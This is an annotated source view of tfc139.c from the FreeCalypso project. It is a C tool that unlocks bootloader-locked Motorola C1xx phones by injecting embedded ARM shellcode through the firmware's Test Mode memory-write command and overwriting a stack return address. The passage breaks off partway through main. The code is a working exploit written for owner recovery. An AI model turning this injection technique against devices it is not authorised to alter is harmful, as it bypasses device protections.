FreeCalypso > hg > freecalypso-sw
annotate rvinterf/lowlevel/tfc139.c @ 1012:93f4fc26b204
fc-shell: arbitrary send command implemented in one-shot mode
author | Mychaela Falconia <falcon@ivan.Harhan.ORG> |
---|---|
date | Sun, 20 Mar 2016 22:06:11 +0000 |
parents | 65418b391513 |
children |
rev | line source |
---|---|
359
144b5d222de8
tfc139 hack utility started, compiles
Michael Spacefalcon <msokolov@ivan.Harhan.ORG>
parents:
diff
changeset
|
1 /* |
984
8c83777f856c
tfc139 reworked for the new "universal" break-in method
Mychaela Falconia <falcon@ivan.Harhan.ORG>
parents:
983
diff
changeset
|
2 * This program facilitates the recovery of those Compal/Motorola phones |
8c83777f856c
tfc139 reworked for the new "universal" break-in method
Mychaela Falconia <falcon@ivan.Harhan.ORG>
parents:
983
diff
changeset
|
3 * whose bootloaders have been maliciously locked down. It connects |
8c83777f856c
tfc139 reworked for the new "universal" break-in method
Mychaela Falconia <falcon@ivan.Harhan.ORG>
parents:
983
diff
changeset
|
4 * to a running Mot C1xx firmware through the RVTMUX interface provided |
8c83777f856c
tfc139 reworked for the new "universal" break-in method
Mychaela Falconia <falcon@ivan.Harhan.ORG>
parents:
983
diff
changeset
|
5 * by the latter and uses the Test Mode memory write command (which |
8c83777f856c
tfc139 reworked for the new "universal" break-in method
Mychaela Falconia <falcon@ivan.Harhan.ORG>
parents:
983
diff
changeset
|
6 * these firmwares implement just like TI's reference fw) to inject |
8c83777f856c
tfc139 reworked for the new "universal" break-in method
Mychaela Falconia <falcon@ivan.Harhan.ORG>
parents:
983
diff
changeset
|
7 * some shellcode and to transfer control to it by overwriting a |
8c83777f856c
tfc139 reworked for the new "universal" break-in method
Mychaela Falconia <falcon@ivan.Harhan.ORG>
parents:
983
diff
changeset
|
8 * function return address on the stack. The injected shellcode then |
8c83777f856c
tfc139 reworked for the new "universal" break-in method
Mychaela Falconia <falcon@ivan.Harhan.ORG>
parents:
983
diff
changeset
|
9 * enables the Calypso boot ROM and jumps to it, allowing fc-loadtool |
8c83777f856c
tfc139 reworked for the new "universal" break-in method
Mychaela Falconia <falcon@ivan.Harhan.ORG>
parents:
983
diff
changeset
|
10 * to take over from there. |
359
144b5d222de8
tfc139 hack utility started, compiles
Michael Spacefalcon <msokolov@ivan.Harhan.ORG>
parents:
diff
changeset
|
11 */ |
144b5d222de8
tfc139 hack utility started, compiles
Michael Spacefalcon <msokolov@ivan.Harhan.ORG>
parents:
diff
changeset
|
12 |
144b5d222de8
tfc139 hack utility started, compiles
Michael Spacefalcon <msokolov@ivan.Harhan.ORG>
parents:
diff
changeset
|
13 #include <sys/types.h> |
144b5d222de8
tfc139 hack utility started, compiles
Michael Spacefalcon <msokolov@ivan.Harhan.ORG>
parents:
diff
changeset
|
14 #include <sys/errno.h> |
144b5d222de8
tfc139 hack utility started, compiles
Michael Spacefalcon <msokolov@ivan.Harhan.ORG>
parents:
diff
changeset
|
15 #include <stdio.h> |
144b5d222de8
tfc139 hack utility started, compiles
Michael Spacefalcon <msokolov@ivan.Harhan.ORG>
parents:
diff
changeset
|
16 #include <string.h> |
144b5d222de8
tfc139 hack utility started, compiles
Michael Spacefalcon <msokolov@ivan.Harhan.ORG>
parents:
diff
changeset
|
17 #include <strings.h> |
144b5d222de8
tfc139 hack utility started, compiles
Michael Spacefalcon <msokolov@ivan.Harhan.ORG>
parents:
diff
changeset
|
18 #include <stdlib.h> |
144b5d222de8
tfc139 hack utility started, compiles
Michael Spacefalcon <msokolov@ivan.Harhan.ORG>
parents:
diff
changeset
|
19 #include <unistd.h> |
144b5d222de8
tfc139 hack utility started, compiles
Michael Spacefalcon <msokolov@ivan.Harhan.ORG>
parents:
diff
changeset
|
20 #include <time.h> |
144b5d222de8
tfc139 hack utility started, compiles
Michael Spacefalcon <msokolov@ivan.Harhan.ORG>
parents:
diff
changeset
|
21 #include "../include/pktmux.h" |
144b5d222de8
tfc139 hack utility started, compiles
Michael Spacefalcon <msokolov@ivan.Harhan.ORG>
parents:
diff
changeset
|
22 #include "../include/limits.h" |
144b5d222de8
tfc139 hack utility started, compiles
Michael Spacefalcon <msokolov@ivan.Harhan.ORG>
parents:
diff
changeset
|
23 |
144b5d222de8
tfc139 hack utility started, compiles
Michael Spacefalcon <msokolov@ivan.Harhan.ORG>
parents:
diff
changeset
|
24 extern int target_fd; |
144b5d222de8
tfc139 hack utility started, compiles
Michael Spacefalcon <msokolov@ivan.Harhan.ORG>
parents:
diff
changeset
|
25 extern char *baudrate_name; |
144b5d222de8
tfc139 hack utility started, compiles
Michael Spacefalcon <msokolov@ivan.Harhan.ORG>
parents:
diff
changeset
|
26 |
144b5d222de8
tfc139 hack utility started, compiles
Michael Spacefalcon <msokolov@ivan.Harhan.ORG>
parents:
diff
changeset
|
27 extern u_char rxpkt[]; |
144b5d222de8
tfc139 hack utility started, compiles
Michael Spacefalcon <msokolov@ivan.Harhan.ORG>
parents:
diff
changeset
|
28 extern size_t rxpkt_len; |
144b5d222de8
tfc139 hack utility started, compiles
Michael Spacefalcon <msokolov@ivan.Harhan.ORG>
parents:
diff
changeset
|
29 |
144b5d222de8
tfc139 hack utility started, compiles
Michael Spacefalcon <msokolov@ivan.Harhan.ORG>
parents:
diff
changeset
|
30 char *logfname; |
144b5d222de8
tfc139 hack utility started, compiles
Michael Spacefalcon <msokolov@ivan.Harhan.ORG>
parents:
diff
changeset
|
31 FILE *logF; |
144b5d222de8
tfc139 hack utility started, compiles
Michael Spacefalcon <msokolov@ivan.Harhan.ORG>
parents:
diff
changeset
|
32 time_t logtime; |
144b5d222de8
tfc139 hack utility started, compiles
Michael Spacefalcon <msokolov@ivan.Harhan.ORG>
parents:
diff
changeset
|
33 int no_output; /* for output.c */ |
144b5d222de8
tfc139 hack utility started, compiles
Michael Spacefalcon <msokolov@ivan.Harhan.ORG>
parents:
diff
changeset
|
34 |
983
7166c8311b0d
tfc139 reworked to support both ARM and Thumb entry
Mychaela Falconia <falcon@ivan.Harhan.ORG>
parents:
975
diff
changeset
|
35 int wakeup_after_sec = 1; |
359
144b5d222de8
tfc139 hack utility started, compiles
Michael Spacefalcon <msokolov@ivan.Harhan.ORG>
parents:
diff
changeset
|
36 |
144b5d222de8
tfc139 hack utility started, compiles
Michael Spacefalcon <msokolov@ivan.Harhan.ORG>
parents:
diff
changeset
|
37 /* see ../../target-utils/tf-breakin/payload.S for the source */ |
983
7166c8311b0d
tfc139 reworked to support both ARM and Thumb entry
Mychaela Falconia <falcon@ivan.Harhan.ORG>
parents:
975
diff
changeset
|
38 static u_char shellcode[114] = { |
7166c8311b0d
tfc139 reworked to support both ARM and Thumb entry
Mychaela Falconia <falcon@ivan.Harhan.ORG>
parents:
975
diff
changeset
|
39 0x78, 0x47, 0xC0, 0x46, 0xD3, 0xF0, 0x21, 0xE3, |
7166c8311b0d
tfc139 reworked to support both ARM and Thumb entry
Mychaela Falconia <falcon@ivan.Harhan.ORG>
parents:
975
diff
changeset
|
40 0x50, 0x10, 0x9F, 0xE5, 0xF5, 0x00, 0xA0, 0xE3, |
7166c8311b0d
tfc139 reworked to support both ARM and Thumb entry
Mychaela Falconia <falcon@ivan.Harhan.ORG>
parents:
975
diff
changeset
|
41 0xB2, 0x00, 0xC1, 0xE1, 0xA0, 0x00, 0xA0, 0xE3, |
7166c8311b0d
tfc139 reworked to support both ARM and Thumb entry
Mychaela Falconia <falcon@ivan.Harhan.ORG>
parents:
975
diff
changeset
|
42 0xB2, 0x00, 0xC1, 0xE1, 0x40, 0x60, 0x9F, 0xE5, |
7166c8311b0d
tfc139 reworked to support both ARM and Thumb entry
Mychaela Falconia <falcon@ivan.Harhan.ORG>
parents:
975
diff
changeset
|
43 0x05, 0x00, 0xD6, 0xE5, 0x20, 0x00, 0x10, 0xE3, |
7166c8311b0d
tfc139 reworked to support both ARM and Thumb entry
Mychaela Falconia <falcon@ivan.Harhan.ORG>
parents:
975
diff
changeset
|
44 0xFC, 0xFF, 0xFF, 0x0A, 0x38, 0x10, 0x8F, 0xE2, |
7166c8311b0d
tfc139 reworked to support both ARM and Thumb entry
Mychaela Falconia <falcon@ivan.Harhan.ORG>
parents:
975
diff
changeset
|
45 0x06, 0x20, 0xA0, 0xE3, 0x01, 0x00, 0xD1, 0xE4, |
7166c8311b0d
tfc139 reworked to support both ARM and Thumb entry
Mychaela Falconia <falcon@ivan.Harhan.ORG>
parents:
975
diff
changeset
|
46 0x00, 0x00, 0xC6, 0xE5, 0x01, 0x20, 0x52, 0xE2, |
7166c8311b0d
tfc139 reworked to support both ARM and Thumb entry
Mychaela Falconia <falcon@ivan.Harhan.ORG>
parents:
975
diff
changeset
|
47 0xFB, 0xFF, 0xFF, 0x1A, 0x05, 0x00, 0xD6, 0xE5, |
7166c8311b0d
tfc139 reworked to support both ARM and Thumb entry
Mychaela Falconia <falcon@ivan.Harhan.ORG>
parents:
975
diff
changeset
|
48 0x40, 0x00, 0x10, 0xE3, 0xFC, 0xFF, 0xFF, 0x0A, |
7166c8311b0d
tfc139 reworked to support both ARM and Thumb entry
Mychaela Falconia <falcon@ivan.Harhan.ORG>
parents:
975
diff
changeset
|
49 0x10, 0x10, 0x9F, 0xE5, 0x01, 0x2C, 0xA0, 0xE3, |
7166c8311b0d
tfc139 reworked to support both ARM and Thumb entry
Mychaela Falconia <falcon@ivan.Harhan.ORG>
parents:
975
diff
changeset
|
50 0xB0, 0x20, 0xC1, 0xE1, 0x00, 0xF0, 0xA0, 0xE3, |
7166c8311b0d
tfc139 reworked to support both ARM and Thumb entry
Mychaela Falconia <falcon@ivan.Harhan.ORG>
parents:
975
diff
changeset
|
51 0x02, 0xF8, 0xFF, 0xFF, 0x00, 0x58, 0xFF, 0xFF, |
7166c8311b0d
tfc139 reworked to support both ARM and Thumb entry
Mychaela Falconia <falcon@ivan.Harhan.ORG>
parents:
975
diff
changeset
|
52 0x10, 0xFB, 0xFF, 0xFF, 0x02, 0x02, 0x02, 0x4F, |
7166c8311b0d
tfc139 reworked to support both ARM and Thumb entry
Mychaela Falconia <falcon@ivan.Harhan.ORG>
parents:
975
diff
changeset
|
53 0x4B, 0x02 |
359
144b5d222de8
tfc139 hack utility started, compiles
Michael Spacefalcon <msokolov@ivan.Harhan.ORG>
parents:
diff
changeset
|
54 }; |
144b5d222de8
tfc139 hack utility started, compiles
Michael Spacefalcon <msokolov@ivan.Harhan.ORG>
parents:
diff
changeset
|
55 |
984
8c83777f856c
tfc139 reworked for the new "universal" break-in method
Mychaela Falconia <falcon@ivan.Harhan.ORG>
parents:
983
diff
changeset
|
56 static unsigned shellcode_load_addr; |
8c83777f856c
tfc139 reworked for the new "universal" break-in method
Mychaela Falconia <falcon@ivan.Harhan.ORG>
parents:
983
diff
changeset
|
57 static unsigned stack_smash_addr; |
8c83777f856c
tfc139 reworked for the new "universal" break-in method
Mychaela Falconia <falcon@ivan.Harhan.ORG>
parents:
983
diff
changeset
|
58 static int thumb_entry = 1; |
359
144b5d222de8
tfc139 hack utility started, compiles
Michael Spacefalcon <msokolov@ivan.Harhan.ORG>
parents:
diff
changeset
|
59 |
360
f9d78057d766
tfc139 hack works!
Michael Spacefalcon <msokolov@ivan.Harhan.ORG>
parents:
359
diff
changeset
|
60 static u_char stack_smash_payload[4]; |
984
8c83777f856c
tfc139 reworked for the new "universal" break-in method
Mychaela Falconia <falcon@ivan.Harhan.ORG>
parents:
983
diff
changeset
|
61 static int breakin_in_progress; |
360
f9d78057d766
tfc139 hack works!
Michael Spacefalcon <msokolov@ivan.Harhan.ORG>
parents:
359
diff
changeset
|
62 |
418
a9bf3e92a30c
tfc139: clean exit on success
Michael Spacefalcon <msokolov@ivan.Harhan.ORG>
parents:
361
diff
changeset
|
63 static char *target_tty_port; |
a9bf3e92a30c
tfc139: clean exit on success
Michael Spacefalcon <msokolov@ivan.Harhan.ORG>
parents:
361
diff
changeset
|
64 |
359
144b5d222de8
tfc139 hack utility started, compiles
Michael Spacefalcon <msokolov@ivan.Harhan.ORG>
parents:
diff
changeset
|
65 static void |
144b5d222de8
tfc139 hack utility started, compiles
Michael Spacefalcon <msokolov@ivan.Harhan.ORG>
parents:
diff
changeset
|
66 send_compal_memwrite(addr, payload, payload_len) |
144b5d222de8
tfc139 hack utility started, compiles
Michael Spacefalcon <msokolov@ivan.Harhan.ORG>
parents:
diff
changeset
|
67 unsigned addr; |
144b5d222de8
tfc139 hack utility started, compiles
Michael Spacefalcon <msokolov@ivan.Harhan.ORG>
parents:
diff
changeset
|
68 u_char *payload; |
144b5d222de8
tfc139 hack utility started, compiles
Michael Spacefalcon <msokolov@ivan.Harhan.ORG>
parents:
diff
changeset
|
69 { |
144b5d222de8
tfc139 hack utility started, compiles
Michael Spacefalcon <msokolov@ivan.Harhan.ORG>
parents:
diff
changeset
|
70 u_char pkt[MAX_PKT_TO_TARGET]; |
144b5d222de8
tfc139 hack utility started, compiles
Michael Spacefalcon <msokolov@ivan.Harhan.ORG>
parents:
diff
changeset
|
71 int i, csum, csum_offset; |
144b5d222de8
tfc139 hack utility started, compiles
Michael Spacefalcon <msokolov@ivan.Harhan.ORG>
parents:
diff
changeset
|
72 |
144b5d222de8
tfc139 hack utility started, compiles
Michael Spacefalcon <msokolov@ivan.Harhan.ORG>
parents:
diff
changeset
|
73 pkt[0] = RVT_TM_HEADER; |
975
0d7cc054ef72
rvinterf/lowlevel: updates for the new knowledge of TM predating ETM
Mychaela Falconia <falcon@ivan.Harhan.ORG>
parents:
432
diff
changeset
|
74 pkt[1] = 0x40; /* old TM3 MEM_WRITE command */ |
359
144b5d222de8
tfc139 hack utility started, compiles
Michael Spacefalcon <msokolov@ivan.Harhan.ORG>
parents:
diff
changeset
|
75 pkt[2] = addr; |
144b5d222de8
tfc139 hack utility started, compiles
Michael Spacefalcon <msokolov@ivan.Harhan.ORG>
parents:
diff
changeset
|
76 pkt[3] = addr >> 8; |
144b5d222de8
tfc139 hack utility started, compiles
Michael Spacefalcon <msokolov@ivan.Harhan.ORG>
parents:
diff
changeset
|
77 pkt[4] = addr >> 16; |
144b5d222de8
tfc139 hack utility started, compiles
Michael Spacefalcon <msokolov@ivan.Harhan.ORG>
parents:
diff
changeset
|
78 pkt[5] = addr >> 24; |
144b5d222de8
tfc139 hack utility started, compiles
Michael Spacefalcon <msokolov@ivan.Harhan.ORG>
parents:
diff
changeset
|
79 bcopy(payload, pkt + 6, payload_len); |
144b5d222de8
tfc139 hack utility started, compiles
Michael Spacefalcon <msokolov@ivan.Harhan.ORG>
parents:
diff
changeset
|
80 csum_offset = payload_len + 6; |
144b5d222de8
tfc139 hack utility started, compiles
Michael Spacefalcon <msokolov@ivan.Harhan.ORG>
parents:
diff
changeset
|
81 csum = 0; |
144b5d222de8
tfc139 hack utility started, compiles
Michael Spacefalcon <msokolov@ivan.Harhan.ORG>
parents:
diff
changeset
|
82 for (i = 1; i < csum_offset; i++) |
144b5d222de8
tfc139 hack utility started, compiles
Michael Spacefalcon <msokolov@ivan.Harhan.ORG>
parents:
diff
changeset
|
83 csum ^= pkt[i]; |
144b5d222de8
tfc139 hack utility started, compiles
Michael Spacefalcon <msokolov@ivan.Harhan.ORG>
parents:
diff
changeset
|
84 pkt[i] = csum; |
144b5d222de8
tfc139 hack utility started, compiles
Michael Spacefalcon <msokolov@ivan.Harhan.ORG>
parents:
diff
changeset
|
85 send_pkt_to_target(pkt, i + 1); |
144b5d222de8
tfc139 hack utility started, compiles
Michael Spacefalcon <msokolov@ivan.Harhan.ORG>
parents:
diff
changeset
|
86 } |
144b5d222de8
tfc139 hack utility started, compiles
Michael Spacefalcon <msokolov@ivan.Harhan.ORG>
parents:
diff
changeset
|
87 |
983
7166c8311b0d
tfc139 reworked to support both ARM and Thumb entry
Mychaela Falconia <falcon@ivan.Harhan.ORG>
parents:
975
diff
changeset
|
88 static void |
984
8c83777f856c
tfc139 reworked for the new "universal" break-in method
Mychaela Falconia <falcon@ivan.Harhan.ORG>
parents:
983
diff
changeset
|
89 initiate_breakin() |
983
7166c8311b0d
tfc139 reworked to support both ARM and Thumb entry
Mychaela Falconia <falcon@ivan.Harhan.ORG>
parents:
975
diff
changeset
|
90 { |
984
8c83777f856c
tfc139 reworked for the new "universal" break-in method
Mychaela Falconia <falcon@ivan.Harhan.ORG>
parents:
983
diff
changeset
|
91 char msgbuf[80]; |
983
7166c8311b0d
tfc139 reworked to support both ARM and Thumb entry
Mychaela Falconia <falcon@ivan.Harhan.ORG>
parents:
975
diff
changeset
|
92 unsigned jump_addr; |
7166c8311b0d
tfc139 reworked to support both ARM and Thumb entry
Mychaela Falconia <falcon@ivan.Harhan.ORG>
parents:
975
diff
changeset
|
93 |
984
8c83777f856c
tfc139 reworked for the new "universal" break-in method
Mychaela Falconia <falcon@ivan.Harhan.ORG>
parents:
983
diff
changeset
|
94 sprintf(msgbuf, |
8c83777f856c
tfc139 reworked for the new "universal" break-in method
Mychaela Falconia <falcon@ivan.Harhan.ORG>
parents:
983
diff
changeset
|
95 "Using shellcode load addr 0x%x, stack smash starting addr 0x%x", |
8c83777f856c
tfc139 reworked for the new "universal" break-in method
Mychaela Falconia <falcon@ivan.Harhan.ORG>
parents:
983
diff
changeset
|
96 shellcode_load_addr, stack_smash_addr); |
8c83777f856c
tfc139 reworked for the new "universal" break-in method
Mychaela Falconia <falcon@ivan.Harhan.ORG>
parents:
983
diff
changeset
|
97 output_line(msgbuf); |
983
7166c8311b0d
tfc139 reworked to support both ARM and Thumb entry
Mychaela Falconia <falcon@ivan.Harhan.ORG>
parents:
975
diff
changeset
|
98 jump_addr = shellcode_load_addr; |
7166c8311b0d
tfc139 reworked to support both ARM and Thumb entry
Mychaela Falconia <falcon@ivan.Harhan.ORG>
parents:
975
diff
changeset
|
99 if (thumb_entry) |
7166c8311b0d
tfc139 reworked to support both ARM and Thumb entry
Mychaela Falconia <falcon@ivan.Harhan.ORG>
parents:
975
diff
changeset
|
100 jump_addr += 1; |
7166c8311b0d
tfc139 reworked to support both ARM and Thumb entry
Mychaela Falconia <falcon@ivan.Harhan.ORG>
parents:
975
diff
changeset
|
101 else |
7166c8311b0d
tfc139 reworked to support both ARM and Thumb entry
Mychaela Falconia <falcon@ivan.Harhan.ORG>
parents:
975
diff
changeset
|
102 jump_addr += 4; |
7166c8311b0d
tfc139 reworked to support both ARM and Thumb entry
Mychaela Falconia <falcon@ivan.Harhan.ORG>
parents:
975
diff
changeset
|
103 stack_smash_payload[0] = jump_addr; |
7166c8311b0d
tfc139 reworked to support both ARM and Thumb entry
Mychaela Falconia <falcon@ivan.Harhan.ORG>
parents:
975
diff
changeset
|
104 stack_smash_payload[1] = jump_addr >> 8; |
7166c8311b0d
tfc139 reworked to support both ARM and Thumb entry
Mychaela Falconia <falcon@ivan.Harhan.ORG>
parents:
975
diff
changeset
|
105 stack_smash_payload[2] = jump_addr >> 16; |
7166c8311b0d
tfc139 reworked to support both ARM and Thumb entry
Mychaela Falconia <falcon@ivan.Harhan.ORG>
parents:
975
diff
changeset
|
106 stack_smash_payload[3] = jump_addr >> 24; |
984
8c83777f856c
tfc139 reworked for the new "universal" break-in method
Mychaela Falconia <falcon@ivan.Harhan.ORG>
parents:
983
diff
changeset
|
107 output_line("Sending shellcode RAM write"); |
8c83777f856c
tfc139 reworked for the new "universal" break-in method
Mychaela Falconia <falcon@ivan.Harhan.ORG>
parents:
983
diff
changeset
|
108 send_compal_memwrite(shellcode_load_addr, shellcode, sizeof shellcode); |
8c83777f856c
tfc139 reworked for the new "universal" break-in method
Mychaela Falconia <falcon@ivan.Harhan.ORG>
parents:
983
diff
changeset
|
109 breakin_in_progress = 1; |
8c83777f856c
tfc139 reworked for the new "universal" break-in method
Mychaela Falconia <falcon@ivan.Harhan.ORG>
parents:
983
diff
changeset
|
110 } |
8c83777f856c
tfc139 reworked for the new "universal" break-in method
Mychaela Falconia <falcon@ivan.Harhan.ORG>
parents:
983
diff
changeset
|
111 |
8c83777f856c
tfc139 reworked for the new "universal" break-in method
Mychaela Falconia <falcon@ivan.Harhan.ORG>
parents:
983
diff
changeset
|
112 static void |
8c83777f856c
tfc139 reworked for the new "universal" break-in method
Mychaela Falconia <falcon@ivan.Harhan.ORG>
parents:
983
diff
changeset
|
113 send_memcheck_query() |
8c83777f856c
tfc139 reworked for the new "universal" break-in method
Mychaela Falconia <falcon@ivan.Harhan.ORG>
parents:
983
diff
changeset
|
114 { |
8c83777f856c
tfc139 reworked for the new "universal" break-in method
Mychaela Falconia <falcon@ivan.Harhan.ORG>
parents:
983
diff
changeset
|
115 u_char sendpkt[25]; |
8c83777f856c
tfc139 reworked for the new "universal" break-in method
Mychaela Falconia <falcon@ivan.Harhan.ORG>
parents:
983
diff
changeset
|
116 |
8c83777f856c
tfc139 reworked for the new "universal" break-in method
Mychaela Falconia <falcon@ivan.Harhan.ORG>
parents:
983
diff
changeset
|
117 output_line("Sending GPF MEMCHECK query"); |
8c83777f856c
tfc139 reworked for the new "universal" break-in method
Mychaela Falconia <falcon@ivan.Harhan.ORG>
parents:
983
diff
changeset
|
118 /* fill out the packet */ |
8c83777f856c
tfc139 reworked for the new "universal" break-in method
Mychaela Falconia <falcon@ivan.Harhan.ORG>
parents:
983
diff
changeset
|
119 sendpkt[0] = RVT_L23_HEADER; |
8c83777f856c
tfc139 reworked for the new "universal" break-in method
Mychaela Falconia <falcon@ivan.Harhan.ORG>
parents:
983
diff
changeset
|
120 sendpkt[1] = 0xB7; /* system prim */ |
8c83777f856c
tfc139 reworked for the new "universal" break-in method
Mychaela Falconia <falcon@ivan.Harhan.ORG>
parents:
983
diff
changeset
|
121 sendpkt[2] = 20; |
8c83777f856c
tfc139 reworked for the new "universal" break-in method
Mychaela Falconia <falcon@ivan.Harhan.ORG>
parents:
983
diff
changeset
|
122 sendpkt[3] = 0; |
8c83777f856c
tfc139 reworked for the new "universal" break-in method
Mychaela Falconia <falcon@ivan.Harhan.ORG>
parents:
983
diff
changeset
|
123 /* send zeros for the timestamp */ |
8c83777f856c
tfc139 reworked for the new "universal" break-in method
Mychaela Falconia <falcon@ivan.Harhan.ORG>
parents:
983
diff
changeset
|
124 sendpkt[4] = 0; |
8c83777f856c
tfc139 reworked for the new "universal" break-in method
Mychaela Falconia <falcon@ivan.Harhan.ORG>
parents:
983
diff
changeset
|
125 sendpkt[5] = 0; |
8c83777f856c
tfc139 reworked for the new "universal" break-in method
Mychaela Falconia <falcon@ivan.Harhan.ORG>
parents:
983
diff
changeset
|
126 sendpkt[6] = 0; |
8c83777f856c
tfc139 reworked for the new "universal" break-in method
Mychaela Falconia <falcon@ivan.Harhan.ORG>
parents:
983
diff
changeset
|
127 sendpkt[7] = 0; |
8c83777f856c
tfc139 reworked for the new "universal" break-in method
Mychaela Falconia <falcon@ivan.Harhan.ORG>
parents:
983
diff
changeset
|
128 /* fixed string with all fields */ |
8c83777f856c
tfc139 reworked for the new "universal" break-in method
Mychaela Falconia <falcon@ivan.Harhan.ORG>
parents:
983
diff
changeset
|
129 strcpy(sendpkt + 8, "PCO L1 MEMCHECK"); |
8c83777f856c
tfc139 reworked for the new "universal" break-in method
Mychaela Falconia <falcon@ivan.Harhan.ORG>
parents:
983
diff
changeset
|
130 /* send it! */ |
8c83777f856c
tfc139 reworked for the new "universal" break-in method
Mychaela Falconia <falcon@ivan.Harhan.ORG>
parents:
983
diff
changeset
|
131 send_pkt_to_target(sendpkt, 24); |
983
7166c8311b0d
tfc139 reworked to support both ARM and Thumb entry
Mychaela Falconia <falcon@ivan.Harhan.ORG>
parents:
975
diff
changeset
|
132 } |
7166c8311b0d
tfc139 reworked to support both ARM and Thumb entry
Mychaela Falconia <falcon@ivan.Harhan.ORG>
parents:
975
diff
changeset
|
133 |
359
144b5d222de8
tfc139 hack utility started, compiles
Michael Spacefalcon <msokolov@ivan.Harhan.ORG>
parents:
diff
changeset
|
134 main(argc, argv) |
144b5d222de8
tfc139 hack utility started, compiles
Michael Spacefalcon <msokolov@ivan.Harhan.ORG>
parents:
diff
changeset
|
135 char **argv; |
144b5d222de8
tfc139 hack utility started, compiles
Michael Spacefalcon <msokolov@ivan.Harhan.ORG>
parents:
diff
changeset
|
136 { |
144b5d222de8
tfc139 hack utility started, compiles
Michael Spacefalcon <msokolov@ivan.Harhan.ORG>
parents:
diff
changeset
|
137 extern char *optarg; |
144b5d222de8
tfc139 hack utility started, compiles
Michael Spacefalcon <msokolov@ivan.Harhan.ORG>
parents:
diff
changeset
|
138 extern int optind; |
144b5d222de8
tfc139 hack utility started, compiles
Michael Spacefalcon <msokolov@ivan.Harhan.ORG>
parents:
diff
changeset
|
139 int c; |
144b5d222de8
tfc139 hack utility started, compiles
Michael Spacefalcon <msokolov@ivan.Harhan.ORG>
parents:
diff
changeset
|
140 fd_set fds; |
144b5d222de8
tfc139 hack utility started, compiles
Michael Spacefalcon <msokolov@ivan.Harhan.ORG>
parents:
diff
changeset
|
141 |
432
15e69d31c96f
tfc139: allow -B option just like rvtdump and rvinterf
Michael Spacefalcon <msokolov@ivan.Harhan.ORG>
parents:
419
diff
changeset
|
142 baudrate_name = "57600"; /* what C139 firmware uses */ |
986
65418b391513
tfc139: -m option restores bogus mot931c.exe-mimicking operation
Mychaela Falconia <falcon@ivan.Harhan.ORG>
parents:
985
diff
changeset
|
143 while ((c = getopt(argc, argv, "a:AB:l:ms:w:")) != EOF) |
359
144b5d222de8
tfc139 hack utility started, compiles
Michael Spacefalcon <msokolov@ivan.Harhan.ORG>
parents:
diff
changeset
|
144 switch (c) { |
419
3a46728e054b
tfc139: -a and -s options to override IRAM payload and stack smash addresses
Michael Spacefalcon <msokolov@ivan.Harhan.ORG>
parents:
418
diff
changeset
|
145 case 'a': |
983
7166c8311b0d
tfc139 reworked to support both ARM and Thumb entry
Mychaela Falconia <falcon@ivan.Harhan.ORG>
parents:
975
diff
changeset
|
146 shellcode_load_addr = strtoul(optarg, 0, 16); |
419
3a46728e054b
tfc139: -a and -s options to override IRAM payload and stack smash addresses
Michael Spacefalcon <msokolov@ivan.Harhan.ORG>
parents:
418
diff
changeset
|
147 continue; |
432
15e69d31c96f
tfc139: allow -B option just like rvtdump and rvinterf
Michael Spacefalcon <msokolov@ivan.Harhan.ORG>
parents:
419
diff
changeset
|
148 case 'B': |
15e69d31c96f
tfc139: allow -B option just like rvtdump and rvinterf
Michael Spacefalcon <msokolov@ivan.Harhan.ORG>
parents:
419
diff
changeset
|
149 baudrate_name = optarg; |
15e69d31c96f
tfc139: allow -B option just like rvtdump and rvinterf
Michael Spacefalcon <msokolov@ivan.Harhan.ORG>
parents:
419
diff
changeset
|
150 continue; |
359
144b5d222de8
tfc139 hack utility started, compiles
Michael Spacefalcon <msokolov@ivan.Harhan.ORG>
parents:
diff
changeset
|
151 case 'l': |
144b5d222de8
tfc139 hack utility started, compiles
Michael Spacefalcon <msokolov@ivan.Harhan.ORG>
parents:
diff
changeset
|
152 logfname = optarg; |
144b5d222de8
tfc139 hack utility started, compiles
Michael Spacefalcon <msokolov@ivan.Harhan.ORG>
parents:
diff
changeset
|
153 continue; |
986
65418b391513
tfc139: -m option restores bogus mot931c.exe-mimicking operation
Mychaela Falconia <falcon@ivan.Harhan.ORG>
parents:
985
diff
changeset
|
154 case 'm': |
65418b391513
tfc139: -m option restores bogus mot931c.exe-mimicking operation
Mychaela Falconia <falcon@ivan.Harhan.ORG>
parents:
985
diff
changeset
|
155 /* mimic mot931c.exe */ |
65418b391513
tfc139: -m option restores bogus mot931c.exe-mimicking operation
Mychaela Falconia <falcon@ivan.Harhan.ORG>
parents:
985
diff
changeset
|
156 shellcode_load_addr = 0x800000; |
65418b391513
tfc139: -m option restores bogus mot931c.exe-mimicking operation
Mychaela Falconia <falcon@ivan.Harhan.ORG>
parents:
985
diff
changeset
|
157 stack_smash_addr = 0x837C54; |
65418b391513
tfc139: -m option restores bogus mot931c.exe-mimicking operation
Mychaela Falconia <falcon@ivan.Harhan.ORG>
parents:
985
diff
changeset
|
158 /* FALL THRU */ |
65418b391513
tfc139: -m option restores bogus mot931c.exe-mimicking operation
Mychaela Falconia <falcon@ivan.Harhan.ORG>
parents:
985
diff
changeset
|
159 case 'A': |
65418b391513
tfc139: -m option restores bogus mot931c.exe-mimicking operation
Mychaela Falconia <falcon@ivan.Harhan.ORG>
parents:
985
diff
changeset
|
160 thumb_entry = 0; |
65418b391513
tfc139: -m option restores bogus mot931c.exe-mimicking operation
Mychaela Falconia <falcon@ivan.Harhan.ORG>
parents:
985
diff
changeset
|
161 continue; |
419
3a46728e054b
tfc139: -a and -s options to override IRAM payload and stack smash addresses
Michael Spacefalcon <msokolov@ivan.Harhan.ORG>
parents:
418
diff
changeset
|
162 case 's': |
3a46728e054b
tfc139: -a and -s options to override IRAM payload and stack smash addresses
Michael Spacefalcon <msokolov@ivan.Harhan.ORG>
parents:
418
diff
changeset
|
163 stack_smash_addr = strtoul(optarg, 0, 16); |
3a46728e054b
tfc139: -a and -s options to override IRAM payload and stack smash addresses
Michael Spacefalcon <msokolov@ivan.Harhan.ORG>
parents:
418
diff
changeset
|
164 continue; |
360
f9d78057d766
tfc139 hack works!
Michael Spacefalcon <msokolov@ivan.Harhan.ORG>
parents:
359
diff
changeset
|
165 case 'w': |
f9d78057d766
tfc139 hack works!
Michael Spacefalcon <msokolov@ivan.Harhan.ORG>
parents:
359
diff
changeset
|
166 wakeup_after_sec = strtoul(optarg, 0, 0); |
f9d78057d766
tfc139 hack works!
Michael Spacefalcon <msokolov@ivan.Harhan.ORG>
parents:
359
diff
changeset
|
167 continue; |
359
144b5d222de8
tfc139 hack utility started, compiles
Michael Spacefalcon <msokolov@ivan.Harhan.ORG>
parents:
diff
changeset
|
168 case '?': |
144b5d222de8
tfc139 hack utility started, compiles
